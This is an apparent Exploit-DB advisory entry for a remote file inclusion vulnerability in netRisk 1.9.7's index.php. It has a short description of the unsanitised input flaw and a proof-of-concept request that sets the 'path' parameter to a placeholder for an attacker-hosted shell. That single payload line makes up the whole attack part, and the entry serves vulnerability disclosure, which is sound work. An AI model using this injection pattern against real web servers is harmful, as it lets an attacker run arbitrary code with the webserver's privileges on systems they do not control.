NetRisk 1.9.7 - 'index.php' Remote File Inclusion

EDB-ID:

30987

CVE:

N/A


Author:

S.W.A.T.

Type:

webapps


Platform:

PHP

Date:

2008-01-04


source: https://www.securityfocus.com/bid/27136/info

netRisk is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code on an affected computer with the privileges of the webserver process.

This issue affects netRisk 1.9.7; other versions may also be affected.

http://www.example.com/Path/index.php?path=[SHELL]